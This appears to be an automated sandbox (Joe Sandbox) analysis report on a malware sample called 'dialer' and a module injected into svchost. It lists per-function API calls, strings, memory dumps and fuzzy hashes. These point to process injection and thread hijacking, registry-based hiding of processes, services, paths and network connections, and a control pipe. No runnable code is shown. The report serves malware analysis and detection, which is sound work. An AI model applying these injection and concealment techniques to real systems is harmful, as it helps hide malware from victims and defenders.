                                                                                  • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                                  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                                  • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                                  • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                                  • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                                  • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                                • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                                • String ID:
                                                                                • API String ID: 3836936051-0
                                                                                • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                                • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                                                Control-flow Graph (graph image not reproduced): basic blocks 140002560-140002a8e; API calls in the graph: GetProcessHeap, HeapAlloc, HeapFree, K32EnumProcesses, ReadFile, RegOpenKeyExW, RegDeleteValueW, ShellExecuteW, lstrlenW, ExitProcess
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                                • String ID: SOFTWARE$dialerstager$open
                                                                                • API String ID: 3276259517-3931493855
                                                                                • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                                                • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                                • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                                                • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

                                                                                Control-flow Graph (graph image not reproduced): basic blocks 140001c88-140001ebf; API calls in the graph: CreateProcessW, VirtualAllocEx, WriteProcessMemory, VirtualAlloc, GetThreadContext, SetThreadContext, ResumeThread, OpenProcess, TerminateProcess
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                                • String ID: @
                                                                                • API String ID: 3462610200-2766056989
                                                                                • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                                • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                • String ID: dialersvc64
                                                                                • API String ID: 4184240511-3881820561
                                                                                • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                                • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Delete$CloseEnumOpen
                                                                                • String ID: SOFTWARE\dialerconfig
                                                                                • API String ID: 3013565938-461861421
                                                                                • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                                • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: File$Write$CloseCreateHandle
                                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                • API String ID: 148219782-3440882674
                                                                                • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                                • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: ntdll.dll
                                                                                • API String ID: 1646373207-2227199552
                                                                                • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                                • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                                Callgraph (graph image not reproduced): call relationships between the functions of the module loaded at 0000000140000000, from Function_0000000140001000 through Function_0000000140005C30

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtQueryFullAttributesFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFileFullQuery
                                                                                • String ID:
                                                                                • API String ID: 3545844373-0
                                                                                • Opcode ID: f71038f0e3432a8f3b164be4f50f2930c35b1c460969590bf0f90e78775cf134
                                                                                • Instruction ID: bfaa91673e3131da4486b8228e2f697fa27fa098225aeef3f4229114262b66f4
                                                                                • Opcode Fuzzy Hash: f71038f0e3432a8f3b164be4f50f2930c35b1c460969590bf0f90e78775cf134
                                                                                • Instruction Fuzzy Hash: 27F09DB2608B4086EAA2DB52F85579A77A0F38D7D4F009919BBC843735DB38C1988F84

                                                                                Control-flow Graph

                                                                                [Control-flow graph rendering for the function at 1400026e0 (basic blocks 1400026e0 to 140002ef4, calling memset, wcsncmp, wcscpy, wcscat, wcslen); graph layout not reproduced]
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                                                • String ID: 0$X$\BaseNamedObjects\ulufoxljdjwhtckuvndvmbau$`
                                                                                • API String ID: 780471329-2590899224
                                                                                • Opcode ID: d8bc8fc7e4f78f97167b8dbf9317a79add4c4b500a37d0f0ebcbe230efc94c19
                                                                                • Instruction ID: 02c86cc2984cac849caf10a33095c616d0d4e11f6c4988ae29273a76e96b46b4
                                                                                • Opcode Fuzzy Hash: d8bc8fc7e4f78f97167b8dbf9317a79add4c4b500a37d0f0ebcbe230efc94c19
                                                                                • Instruction Fuzzy Hash: 721227B2618B8085E762CB26F8443EA77A4F789794F404215EBE957BF5EF78C189C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 2643109117-0
                                                                                • Opcode ID: 87217a8e6000bbfc0c2be15322c96d6386af0d1a3f2dc2985034ce914cf2b36b
                                                                                • Instruction ID: 5f7da3ae107d405e68b1edf1d60b0e34c591a5af8501f008d8300acc40c00392
                                                                                • Opcode Fuzzy Hash: 87217a8e6000bbfc0c2be15322c96d6386af0d1a3f2dc2985034ce914cf2b36b
                                                                                • Instruction Fuzzy Hash: 6751F6B1615A4485FB66EF27F9543EA27A2B78D7C0F449025FB8D873B1DE38C5998300

                                                                                Control-flow Graph

                                                                                [Control-flow graph rendering for the function at 140001ba0 (basic blocks 140001ba0 to 140001d38, calling VirtualQuery, VirtualProtect, memcpy, GetLastError); graph layout not reproduced]
                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,?,?,0000000140006C1C,0000000140006C1C,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,0000000140006C1C,0000000140006C1C,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                                • memcpy.MSVCRT ref: 0000000140001CE0
                                                                                • GetLastError.KERNEL32(?,?,?,?,0000000140006C1C,0000000140006C1C,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                • API String ID: 2595394609-2123141913
                                                                                • Opcode ID: b1b7e208cbfd982792d29b849ac8fe48206c6b00b3f65009bf975a8b8e4bd385
                                                                                • Instruction ID: b4b871632bc00ec96096dee12abb5cd58094b498594b1af434097fef9d7194fa
                                                                                • Opcode Fuzzy Hash: b1b7e208cbfd982792d29b849ac8fe48206c6b00b3f65009bf975a8b8e4bd385
                                                                                • Instruction Fuzzy Hash: 794121F1200A4582FA66DF57F884BE927A1F78DBC4F554126AF0A877B1DA38C58AC700

                                                                                Control-flow Graph

                                                                                [Control-flow graph rendering for the function at 140002104 (basic blocks 140002104 to 140002280, calling EnterCriticalSection, LeaveCriticalSection, TlsGetValue, GetLastError, DeleteCriticalSection, free); graph layout not reproduced]
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                                • String ID:
                                                                                • API String ID: 3326252324-0
                                                                                • Opcode ID: 56409736d05acbafabb28bd6c98cf49f7b900e7b0d0542129dea5e3438686952
                                                                                • Instruction ID: 1b2f857d1c11c80ccd1669c0cda9419b2295ebfa2ed7f8f5e033496b962d3f42
                                                                                • Opcode Fuzzy Hash: 56409736d05acbafabb28bd6c98cf49f7b900e7b0d0542129dea5e3438686952
                                                                                • Instruction Fuzzy Hash: 4B21E3B0215A1192FA2BDB53FD443E823A5BB2DBD0F444021FF5A57AB4DF78C9868700

                                                                                Control-flow Graph

                                                                                [Control-flow graph rendering for the function at 140001e10 (basic blocks 140001e10 to 140001f69, calling signal); graph layout not reproduced]
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CCG
                                                                                • API String ID: 0-1584390748
                                                                                • Opcode ID: fce7a999a73daaf90da284007033cb31bb16023eced34f6d8ea2430d44c4fd8d
                                                                                • Instruction ID: 2dbda8d1ddc0485651b81983135d47e8c896bf154ac445d1c6925c92dfcdf9b7
                                                                                • Opcode Fuzzy Hash: fce7a999a73daaf90da284007033cb31bb16023eced34f6d8ea2430d44c4fd8d
                                                                                • Instruction Fuzzy Hash: EB2159B2A0150642FA77DA2BB5943FA1182ABCD7E4F258535BF19473F9DE3C88828241

                                                                                Control-flow Graph

                                                                                [Control-flow graph rendering for the function at 140001880 (basic blocks 140001880 to 140001b98, calling VirtualProtect); graph layout not reproduced]
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                • API String ID: 544645111-395989641
                                                                                • Opcode ID: 4d568077bf3a6511ed5fd5d2384f2baeebd9958c330e4c2709e1f785095984e7
                                                                                • Instruction ID: f48d0573b98199f2793b136c5a8b456db72710f94d6882f512d3c02bcf328a4a
                                                                                • Opcode Fuzzy Hash: 4d568077bf3a6511ed5fd5d2384f2baeebd9958c330e4c2709e1f785095984e7
                                                                                • Instruction Fuzzy Hash: 565126B2710A44D6EB22CF67F8407E92762B75DBE8F448221EB19177B4CB38C586C700

                                                                                Control-flow Graph

                                                                                [Control-flow graph rendering for the function at 140001800 (basic blocks 140001800 to 140001867, calling fprintf); graph layout not reproduced]
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: fprintf
                                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                • API String ID: 383729395-3474627141
                                                                                • Opcode ID: b6079dff3363becc83fcef3a4e1204cf29f8e4fe9715082ae6ac4d4aca271860
                                                                                • Instruction ID: 69d9501a9c47ad2fd874abcaf6ee1dfba6e3584fb722d73cc25c0902850ad717
                                                                                • Opcode Fuzzy Hash: b6079dff3363becc83fcef3a4e1204cf29f8e4fe9715082ae6ac4d4aca271860
                                                                                • Instruction Fuzzy Hash: 44F09671614A8482E612EB76F9413ED6361E75D7C1F54D211FF4D67662DF38D282C300

                                                                                Control-flow Graph

                                                                                [Control-flow graph rendering for the function at 14000219e (basic blocks 14000219e to 140002280, calling EnterCriticalSection, LeaveCriticalSection, TlsGetValue, GetLastError); graph layout not reproduced]
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 682475483-0
                                                                                • Opcode ID: 3a459fcdbc80fe9b62440a1f38410dc30506dfee9ca17ef21d3eb494726ce865
                                                                                • Instruction ID: da2fa759d30cdf420d52835b0a571db0c3b1a4c0d2d073a37084aed344a210a8
                                                                                • Opcode Fuzzy Hash: 3a459fcdbc80fe9b62440a1f38410dc30506dfee9ca17ef21d3eb494726ce865
                                                                                • Instruction Fuzzy Hash: A001AFB5205A1192FA2BDB63FE043E86265BB2CBD1F454021EF1957BB4DF78C9968300

                                                                                Callgraph

                                                                                Call graph (rendered graph not reproduced): Function_0000000140846070 -> Function_00000001408460F0 -> Function_0000000140846321 and Function_00000001408460B2.

                                                                                Control-flow Graph

                                                                                Control-flow graph (rendered graph not reproduced): basic blocks 1408460f0-140846318, calling LoadLibraryA, GetProcAddressForCaller, ExitProcess and VirtualProtect (twice), with subcalls to 1408460b2 and 140846321.
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002D.00000002.3359712073.0000000140840000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002D.00000002.3359354811.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002D.00000002.3359712073.00000001404DC000.00000040.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002D.00000002.3359712073.0000000140500000.00000040.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002D.00000002.3359712073.0000000140503000.00000040.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002D.00000002.3359712073.000000014078B000.00000040.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002D.00000002.3359712073.000000014080D000.00000040.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000002D.00000002.3369758146.0000000140847000.00000004.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                                                • String ID:
                                                                                • API String ID: 1941872368-0
                                                                                • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                                • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                                                • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                                • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 16feaae96375266c24b17968b5a080657b5ae57e6ff703aba3d68dcbcffacad4
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: 2F711736358F1486EB15DF22FC5BB9963B4FB88B8AF001561EA4E47A68DF38C444C358

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: aade9cdc764c3959dde9a52c1c94ad6719753b48d41f7c1d1db878778cbbdd05
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: A411F93269CF008AFB6EA761FC0F79E2294B7A4347F4081A5D906496D0EF7CC044C62C

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00000257E10A1628: GetProcessHeap.KERNEL32 ref: 00000257E10A1633
